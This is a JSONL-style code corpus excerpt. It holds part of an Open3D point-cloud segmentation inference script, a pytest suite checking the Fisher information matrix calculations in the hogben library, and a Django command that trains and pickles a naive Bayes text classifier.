cfg.pipeline, cfg.model\n\n def setup_lut_colors(self):\n Unlabeled = [231, 87, 36]\n Floor = [188, 169, 26]\n Wall = [100, 244, 245]\n Robot = [150, 30, 140]\n Human = [0, 248, 26]\n AGV = [18, 35, 243]\n\n colors = {\n \"Unlabeled\": [x / 255.0 for x in Unlabeled],\n \"Floor\": [x / 255.0 for x in Floor],\n \"Wall\": [x / 255.0 for x in Wall],\n \"Robot\": [x / 255.0 for x in Robot],\n \"Human\": [x / 255.0 for x in Human],\n \"AGV\": [x / 255.0 for x in AGV],\n }\n\n self.colors = colors\n\n def config_pipeline(self):\n\n cfg = self._ml3d.utils.Config.load_from_file(self.args.cfg_file)\n\n Pipeline = self._ml3d.utils.get_module(\"pipeline\", cfg.pipeline.name, self.args.framework)\n Model = self._ml3d.utils.get_module(\"model\", cfg.model.name, self.args.framework)\n Dataset = self._ml3d.utils.get_module(\"dataset\", cfg.dataset.name)\n\n cfg_dataset, cfg_pipeline, cfg_model = self.merge_cfg_file(cfg, self.args)\n\n self.dataset = Dataset(**cfg_dataset)\n self.model = Model(**cfg_model)\n self.pipeline = Pipeline(self.model, self.dataset, **cfg_pipeline)\n\n self.pipeline.cfg_tb = {\n \"readme\": \"readme\",\n \"cmd_line\": \"cmd_line\",\n \"dataset\": pprint.pformat(cfg_dataset, indent=2),\n \"model\": pprint.pformat(cfg_model, indent=2),\n \"pipeline\": pprint.pformat(cfg_pipeline, indent=2),\n }\n\n def run_pipeline_inference(self, dataframe):\n print(dataframe.name)\n results = self.pipeline.run_inference(dataframe.data)\n pred = (results[\"predict_labels\"]).astype(np.int32)\n return 
pred\n\n def run_pipeline_traintest(self):\n if self.args.split == \"test\":\n self.pipeline.run_test()\n else:\n self.pipeline.run_train()\n\n def run_pipeline_test(self):\n self.pipeline.load_ckpt(ckpt_path=self.args.ckpt_path)\n test_split = self.dataset.get_split(\"test\")\n\n vis_points = []\n times = []\n acc = []\n\n for idx in range(len(test_split)):\n # for idx in range(5):\n\n st = time.perf_counter()\n attr = test_split.get_attr(idx)\n data = test_split.get_data(idx)\n\n print(attr)\n results = self.pipeline.run_inference(data)\n\n pred = (results[\"predict_labels\"]).astype(np.int32)\n # scores = results['predict_scores']\n\n label = data[\"label\"]\n pts = data[\"point\"]\n\n vis_d = {\n \"name\": attr[\"name\"],\n \"points\": pts,\n \"labels\": label,\n \"pred\": pred,\n }\n\n vis_points.append(vis_d)\n et = time.perf_counter()\n times.append(et - st)\n\n correct = (pred == label).sum()\n print(f\"Correct: \" + str(correct) + \" out of \" + str(len(label)))\n accuracy = correct / len(label)\n acc.append(accuracy)\n print(f\"Accuracy: \" + str(accuracy))\n\n print(\"\\n\")\n print(times)\n print(f\"Average time {np.mean(times):0.4f} seconds\")\n overall_acc = np.asarray(acc).sum() / len(acc)\n print(\"Overall Accuracy: \" + str(overall_acc))\n\n v = self.ml3d.vis.Visualizer()\n lut = self.ml3d.vis.LabelLUT()\n\n label_names = self.dataset.get_label_to_names()\n pprint.pprint(label_names)\n\n for (c, cv), (l, lv) in zip(self.colors.items(), label_names.items()):\n lut.add_label(lv, l, cv)\n\n v.set_lut(\"labels\", lut)\n v.set_lut(\"pred\", lut)\n\n v.visualize(vis_points, width=2600, height=2000)\n\n\ndef main(args):\n ps = SemSegPredictor()\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n", "sub_path": "mytests/ml-pipeline-inference.py", "file_name": "ml-pipeline-inference.py", "file_ext": "py", "file_size_in_byte": 6326, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path.home", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "open3d.ml", "line_number": 27, "usage_type": "name"}, {"api_name": "pprint.pprint", "line_number": 40, "usage_type": "call"}, {"api_name": "open3d.ml.torch", "line_number": 45, "usage_type": "name"}, {"api_name": "open3d.ml.tf", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.config.experimental.list_physical_devices", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 121, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 122, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 129, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 156, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 182, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 189, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 205, "usage_type": "attribute"}]} +{"seq_id": "654418457", "text": "import copy\n\nimport 
bumps.parameter\nimport numpy as np\nimport pytest\nimport refnx\nimport refl1d.experiment\n\nfrom hogben.simulate import simulate\nfrom hogben.utils import fisher\nfrom refnx.reflect import SLD as SLD_refnx\nfrom refl1d.material import SLD as SLD_refl1d\nfrom unittest.mock import Mock, patch\n\n\nQS = [np.array([0.1, 0.2, 0.4, 0.6, 0.8])]\nCOUNTS = [np.ones(len(QS[0])) * 100]\n\n\n@pytest.fixture\ndef refl1d_model():\n \"\"\"Define a bilayer sample, and return the associated refl1d model\"\"\"\n # Define sample\n air = SLD_refl1d(rho=0, name='Air')\n layer1 = SLD_refl1d(rho=4, name='Layer 1')(thickness=60, interface=8)\n layer2 = SLD_refl1d(rho=8, name='Layer 2')(thickness=150, interface=2)\n substrate = SLD_refl1d(rho=2.047, name='Substrate')(thickness=0,\n interface=2)\n layer1.thickness.pm(10)\n layer2.thickness.pm(10)\n layer1.interface.pm(1)\n layer2.interface.pm(1)\n sample = substrate | layer2 | layer1 | air\n\n # Define model\n angle_times = [(0.7, 100, 5), (2.0, 100, 20)] # (Angle, Points, Time)\n model, _ = simulate(sample, angle_times)\n model.xi = [layer1.interface, layer2.interface, layer1.thickness,\n layer2.thickness]\n return model\n\n\n@pytest.fixture\ndef refnx_model():\n \"\"\"Define a bilayer sample, and return the associated refnx model\"\"\"\n # Define sample\n air = SLD_refnx(0, name='Air')\n layer1 = SLD_refnx(4, name='Layer 1')(thick=60, rough=8)\n layer2 = SLD_refnx(8, name='Layer 2')(thick=150, rough=2)\n substrate = SLD_refnx(2.047, name='Substrate')(thick=0, rough=2)\n layer1.thick.bounds = (50, 70)\n layer2.thick.bounds = (140, 160)\n layer1.rough.bounds = (7, 9)\n layer2.rough.bounds = (1, 3)\n sample = air | layer1 | layer2 | substrate\n model = refnx.reflect.ReflectModel(sample, scale=1, bkg=5e-6, dq=2)\n # Define model\n model.xi = [layer1.rough, layer2.rough, layer1.thick, layer2.thick]\n return model\n\n\n@pytest.fixture\ndef mock_refnx_model():\n \"\"\"\n Create a mock of the refnx model with a given set of parameters and their\n bounds\n \"\"\"\n # Parameters described as tuples: (value, lower bound, upper bound)\n parameter_values = [(20, 15, 25), (50, 45, 55), (10, 7.5, 8.5),\n (2, 1.5, 2.5)]\n\n # Fill parameter values and bounds\n parameters = [\n Mock(spec=refnx.analysis.Parameter, value=value,\n bounds=Mock(lb=lb, ub=ub))\n for value, lb, ub in parameter_values\n ]\n model = Mock(spec=refnx.reflect.ReflectModel, xi=parameters)\n model.xi = parameters\n return model\n\n\n@pytest.fixture\ndef mock_refl1d_model():\n \"\"\"\n Create a mock of the refl1d model with a given set of parameters and their\n bounds\n \"\"\"\n # Parameters described as tuples: (value, lower bound, upper bound)\n parameter_values = [(20, 15, 25), (50, 45, 55), (10, 7.5, 8.5),\n (2, 1.5, 2.5)]\n\n # Fill parameter values and bounds\n parameters = [\n Mock(spec=bumps.parameter.Parameter, value=value,\n bounds=Mock(limits=[lb, ub]))\n for value, lb, ub in parameter_values\n ]\n model = Mock(spec=refl1d.experiment.Experiment, xi=parameters)\n model.xi = parameters\n return model\n\n\ndef generate_reflectivity_data():\n \"\"\"\n Generates predefined reflectivity. The reflectivity values are yielded\n alternately between two predefined lists of reflectivity values,\n simulating a change in reflectivity between two data points\n \"\"\"\n r = [[1.0, 0.5, 0.4, 0.2, 0.1], [0.95, 0.45, 0.35, 0.15, 0.05]]\n while True:\n yield r[0]\n yield r[1]\n\n\ndef test_fisher_workflow_refnx(refnx_model):\n \"\"\"\n Runs the entire fisher workflow for the refnx model, and checks that the\n 
corresponding results are consistent with the expected values\n \"\"\"\n g = fisher(QS, refnx_model.xi, COUNTS, [refnx_model])\n expected_fisher = [\n [5.17704306e-06, 2.24179068e-06, -5.02221954e-07, -7.91886209e-07],\n [2.24179068e-06, 1.00559528e-06, -2.09433754e-07, -3.18583142e-07],\n [-5.02221954e-07, -2.09433754e-07, 5.75647233e-08, 1.03142100e-07],\n [-7.91886209e-07, -3.18583142e-07, 1.03142100e-07, 1.99470835e-07]\n ]\n np.testing.assert_allclose(g, expected_fisher, rtol=1e-08)\n\n\ndef test_fisher_workflow_refl1d(refl1d_model):\n \"\"\"\n Runs the entire fisher workflow for the refl1d model, and checks that the\n corresponding results are consistent with the expected values\n \"\"\"\n g = fisher(QS, refl1d_model.xi, COUNTS, [refl1d_model])\n expected_fisher = [\n [4.58294661e-06, 2.07712766e-06, -4.23068571e-07, -6.80596824e-07],\n [2.07712766e-06, 9.76175381e-07, -1.84017555e-07, -2.83513452e-07],\n [-4.23068571e-07, -1.84017555e-07, 4.51142562e-08, 8.21397190e-08],\n [-6.80596824e-07, -2.83513452e-07, 8.21397190e-08, 1.62625881e-07]\n ]\n np.testing.assert_allclose(g, expected_fisher, rtol=1e-08)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\ndef test_fisher_analytical_values(mock_reflectivity, model_class, request):\n \"\"\"\n Tests that the values of the calculated Fisher information matrix (FIM)\n are calculated correctly when no importance scaling is given.\n\n The FIM is calculated using matrix multiplication given:\n g = J.T x M x J\n\n\n Where J describes the Jacobian of the reflectance with respect to the\n parameter value, and M describes the diagonal matrix of the incident count\n divided by the model reflectances. J.T describes the transpose of J.\n\n For this unit test the values for J and M are known:\n J = [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ],\n [-0.25, -0.1 , -0.5 ]\n\n M is given by:\n M = [ 100., 0., 0., 0., 0.],\n [ 0., 200., 0., 0., 0.],\n [ 0., 0., 250., 0., 0.],\n [ 0., 0., 0., 500., 0.],\n [ 0., 0., 0., 0., 1000.]\n\n Resulting in g = J.T x M x J:\n g = [128.125, 51.25 , 256.25 ],\n [ 51.25 , 20.5 , 102.5 ],\n [256.25 , 102.5 , 512.5 ]\n\n After this, the elements are scaled to the bounds of each parameter, using:\n g_scaled = H.T * g * H\n Where H is a diagonal matrix where the diagonal elements for each\n parameter are given by H_ij = 1/(upper_bound - lower_bound), resulting in:\n H = [0.1, 0. , 0. ],\n [0. , 0.1, 0. ],\n [0. , 0. , 1. 
]\n\n Which should finally result in the FIM matrix equal to:\n g = [1.28125, 0.5125, 25.625],\n [0.5125, 0.205, 10.25],\n [25.625, 10.25, 512.5]\n \"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:3]\n mock_reflectivity.side_effect = generate_reflectivity_data()\n g_correct = [\n [1.28125, 0.5125, 25.625],\n [0.5125, 0.205, 10.25],\n [25.625, 10.25, 512.5]\n ]\n g_reference = fisher(QS, xi, COUNTS, [model])\n np.testing.assert_allclose(g_reference, g_correct, rtol=1e-08)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\ndef test_fisher_importance_scaling(mock_reflectivity, model_class, request):\n \"\"\"\n Tests that the values of the calculated Fisher information matrix\n are calculated correctly when an importance scaling is applied.\n\n The importance scaling is applied by scaling each parameter of the FIM\n to a given importance value using g_scaled = g * importance\n Where g is the unscaled FIM, and importance is a diagonal matrix with\n the importance scaling of each parameter on the diagonals. For this unit\n test the importance matrix is equal to:\n importance = [1, 0 , 0]\n [0, 2, 0]\n [0, 0, 3]\n Yielding a FIM where every column should be scaled by the corresponding\n diagonal in the importance matrix:\n g = [1.28125, 1.025, 76.875],\n [0.5125, 0.41, 30.75],\n [25.625, 20.5, 1537.5]\n \"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:3]\n for index, param in enumerate(xi):\n param.importance = index + 1\n mock_reflectivity.side_effect = generate_reflectivity_data()\n g_correct = [\n [1.28125, 1.025, 76.875],\n [0.5125, 0.41, 30.75],\n [25.625, 20.5, 1537.5]\n ]\n g_reference = fisher(QS, xi, COUNTS, [model])\n np.testing.assert_allclose(g_reference, g_correct, rtol=1e-08)\n\n\n@pytest.mark.parametrize('model_class', (\"refl1d_model\",\n \"refnx_model\"))\n@pytest.mark.parametrize('step', (0.01, 0.0075, 0.0025, 0.001, 0.0001))\ndef test_fisher_consistent_steps(step, model_class, request):\n \"\"\"\n Tests whether the Fisher information remains mostly consistent when\n changing step size for either model\n \"\"\"\n model = request.getfixturevalue(model_class)\n g_reference = fisher(QS, model.xi, COUNTS, [model], step=0.005)\n g_compare = fisher(QS, model.xi, COUNTS, [model], step=step)\n np.testing.assert_allclose(g_reference, g_compare, rtol=1e-02)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@pytest.mark.parametrize('model_params', (1, 2, 3, 4))\ndef test_fisher_shape(mock_reflectivity, model_params, model_class, request):\n \"\"\"\n Tests whether the shape of the Fisher information matrix remains\n correct when changing the number of parameters\n \"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:model_params]\n\n mock_reflectivity.side_effect = generate_reflectivity_data()\n\n expected_shape = (model_params, model_params)\n g = fisher(QS, xi, COUNTS, [model])\n np.testing.assert_array_equal(g.shape, expected_shape)\n\n\n@patch('hogben.utils.reflectivity')\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@pytest.mark.parametrize('qs',\n (np.arange(0.001, 1.0, 0.25),\n np.arange(0.001, 1.0, 0.10),\n np.arange(0.001, 1.0, 0.05),\n np.arange(0.001, 1.0, 0.01)))\ndef test_fisher_diagonal_non_negative(mock_reflectivity, qs, model_class,\n request):\n \"\"\"Tests whether the diagonal values in the Fisher 
information matrix\n are all zero or greater\"\"\"\n model = request.getfixturevalue(model_class)\n mock_reflectivity.side_effect = (np.random.rand(len(qs)) for _ in range(9))\n counts = [np.ones(len(qs)) * 100]\n g = fisher([qs], model.xi, counts, [model])\n assert np.all(np.diag(g) >= 0)\n\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@pytest.mark.parametrize('model_params', (1, 2, 3, 4))\ndef test_fisher_no_data(model_params, model_class, request):\n \"\"\"Tests whether a model with zero data points properly returns an empty\n matrix of the correct shape\"\"\"\n model = request.getfixturevalue(model_class)\n xi = model.xi[:model_params]\n g = fisher([], xi, COUNTS, [model])\n np.testing.assert_equal(g, np.zeros((len(xi), len(xi))))\n\n\n@pytest.mark.parametrize('model_class', (\"mock_refl1d_model\",\n \"mock_refnx_model\"))\n@patch('hogben.utils.reflectivity')\ndef test_fisher_no_parameters(mock_reflectivity, model_class, request):\n \"\"\"Tests whether a model without any parameters properly returns a\n zero array\"\"\"\n model = request.getfixturevalue(model_class)\n mock_reflectivity.side_effect = generate_reflectivity_data()\n g = fisher(QS, [], COUNTS, [model])\n np.testing.assert_equal(g.shape, (0, 0))\n\n\n@pytest.mark.parametrize('model_class', (\"refnx_model\",\n \"refl1d_model\"))\ndef test_fisher_doubling_with_two_identical_models(model_class, request):\n \"\"\"\n Tests that using two identical models with the same q-points and counts\n correctly doubles the values of the elements in the Fisher information\n matrix\n \"\"\"\n model = request.getfixturevalue(model_class)\n g_single = fisher(QS, model.xi, COUNTS, [model], 0.005)\n\n counts = [COUNTS[0], COUNTS[0]]\n qs = [QS[0], QS[0]]\n g_double = fisher(qs, model.xi, counts, [model, model], 0.005)\n np.testing.assert_allclose(g_double, g_single * 2, rtol=1e-08)\n\n\n@pytest.mark.parametrize('model_class', (\"refnx_model\",\n \"refl1d_model\"))\ndef test_multiple_models_shape(model_class, request):\n \"\"\"\n Tests that the shape of the Fisher information matrix is equal to the total\n sum of parameters over all models.\n \"\"\"\n model = request.getfixturevalue(model_class)\n model_2 = copy.deepcopy(model)\n model_2.xi = model_2.xi[:-1]\n xi = model.xi + model_2.xi\n xi_length = len(model.xi) + len(model_2.xi)\n counts = [COUNTS[0], COUNTS[0]]\n qs = [QS[0], QS[0]]\n g_double = fisher(qs, xi, counts, [model, model_2], 0.005)\n np.testing.assert_equal(g_double.shape, (xi_length, xi_length))\n", "sub_path": "hogben/tests/test_fisher.py", "file_name": "test_fisher.py", "file_ext": "py", "file_size_in_byte": 13294, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 17, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 24, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 25, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 26, "usage_type": "call"}, {"api_name": "refl1d.material.SLD", "line_number": 27, "usage_type": "call"}, {"api_name": "hogben.simulate.simulate", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 20, "usage_type": "attribute"}, {"api_name": "refnx.reflect.SLD", "line_number": 47, "usage_type": "call"}, {"api_name": "refnx.reflect.SLD", "line_number": 48, "usage_type": "call"}, {"api_name": 
"refnx.reflect.SLD", "line_number": 49, "usage_type": "call"}, {"api_name": "refnx.reflect.SLD", "line_number": 50, "usage_type": "call"}, {"api_name": "refnx.reflect.ReflectModel", "line_number": 56, "usage_type": "call"}, {"api_name": "refnx.reflect", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 43, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 74, "usage_type": "call"}, {"api_name": "refnx.analysis", "line_number": 74, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 75, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 78, "usage_type": "call"}, {"api_name": "refnx.reflect", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 62, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 95, "usage_type": "call"}, {"api_name": "bumps.parameter.parameter", "line_number": 95, "usage_type": "attribute"}, {"api_name": "bumps.parameter", "line_number": 95, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 96, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 99, "usage_type": "call"}, {"api_name": "refl1d.experiment.experiment", "line_number": 99, "usage_type": "attribute"}, {"api_name": "refl1d.experiment", "line_number": 99, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 83, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 128, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 143, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 203, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 147, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 147, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 239, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 206, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 207, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 207, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 251, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 253, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 242, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 244, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 
244, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_equal", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 272, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 256, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 257, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 259, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 259, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 288, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 289, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 291, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 275, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 276, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 276, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 278, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 278, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 282, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.testing.assert_equal", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 302, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 293, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 295, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 295, "usage_type": "attribute"}, {"api_name": "hogben.utils.fisher", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.testing.assert_equal", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 305, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 305, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 307, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 326, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 331, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 317, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 317, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 342, "usage_type": "call"}, {"api_name": "hogben.utils.fisher", "line_number": 348, "usage_type": "call"}, 
{"api_name": "numpy.testing.assert_equal", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.testing", "line_number": 349, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 334, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 334, "usage_type": "attribute"}]} +{"seq_id": "575085980", "text": "from django.core.management.base import BaseCommand\nimport numpy as np\nimport pickle\nimport os\nimport sys\nimport gc\n\nsys.path.append(os.getcwd())\nfrom web_app.models import Table\nfrom clf_model.nb_model.naive_bayes import MultinomialNaiveBayes\nfrom preprocess import word_segmentation, bags_of_words, split\nfrom scrape.config import TOP_CATEGORY\n\nMODEL_DUMP_PATH = \"web_app/classification_dump\"\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n \"\"\"\n seedsを指定する関数\n\n :param parser:\n :return:\n \"\"\"\n parser.add_argument('-s'\n '--seeds',\n dest='seeds',\n type=int,\n default=None)\n\n def _dump_model(self, preprocess_obj, model_obj):\n \"\"\"作成したモデルを保存する関数\n\n :param preprocess_obj:\n :param model_obj:\n :return:\n \"\"\"\n with open(os.path.join(MODEL_DUMP_PATH, 'preprocess.pickle'),\n mode='wb') as f:\n pickle.dump(preprocess_obj, f)\n\n with open(os.path.join(MODEL_DUMP_PATH, 'model.pickle'),\n mode='wb') as f:\n pickle.dump(model_obj, f)\n\n def _create_model(self, SEEDS):\n \"\"\"モデルを作成して保存する一連の関数\n\n :param SEEDS:\n :return:\n \"\"\"\n print('わかち書き開始')\n x = np.array([word_segmentation.wakachi(data.content) for data in\n Table.objects.all()])\n y = np.array(\n [TOP_CATEGORY[data.category] for data in Table.objects.all()])\n\n print('seeds = {}でデータを分割'.format(SEEDS))\n train_x, train_y, _, _ = split.split_train_test(x, y, seeds=SEEDS)\n\n # メモリ節約のため削除\n del x\n del y\n gc.collect()\n\n print('単語ベクトル学習開始')\n preprocess_obj = bags_of_words.Bow()\n processed_train_x = np.array(preprocess_obj.fit_transform(train_x),\n dtype=np.float32)\n\n #  メモリ節約のため削除\n del train_x\n gc.collect()\n\n print('モデル学習開始')\n model_obj = MultinomialNaiveBayes()\n model_obj.fit(processed_train_x, train_y)\n\n print('モデルのdump開始')\n self._dump_model(preprocess_obj, model_obj)\n\n print('DONE')\n\n def handle(self, *args, **options):\n \"\"\"カスタムコマンドが呼び出された時に動く関数\n\n :param args:\n :param options:\n :return:\n \"\"\"\n print(\"START\")\n SEEDS = options['seeds']\n self._create_model(SEEDS)\n", "sub_path": "web_app/management/commands/command_create_model.py", "file_name": "command_create_model.py", "file_ext": "py", "file_size_in_byte": 2718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "preprocess.word_segmentation.wakachi", "line_number": 54, "usage_type": 
"call"}, {"api_name": "preprocess.word_segmentation", "line_number": 54, "usage_type": "name"}, {"api_name": "web_app.models.Table.objects.all", "line_number": 55, "usage_type": "call"}, {"api_name": "web_app.models.Table.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "web_app.models.Table", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "scrape.config.TOP_CATEGORY", "line_number": 57, "usage_type": "name"}, {"api_name": "web_app.models.Table.objects.all", "line_number": 57, "usage_type": "call"}, {"api_name": "web_app.models.Table.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "web_app.models.Table", "line_number": 57, "usage_type": "name"}, {"api_name": "preprocess.split.split_train_test", "line_number": 60, "usage_type": "call"}, {"api_name": "preprocess.split", "line_number": 60, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 65, "usage_type": "call"}, {"api_name": "preprocess.bags_of_words.Bow", "line_number": 68, "usage_type": "call"}, {"api_name": "preprocess.bags_of_words", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gc.collect", "line_number": 74, "usage_type": "call"}, {"api_name": "clf_model.nb_model.naive_bayes.MultinomialNaiveBayes", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "643832438", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 14 21:28:15 2017.\n\n@author: spiros\n\"\"\"\n\nimport numpy as np\nimport pickle\nimport sys\nimport os\nimport time\nimport 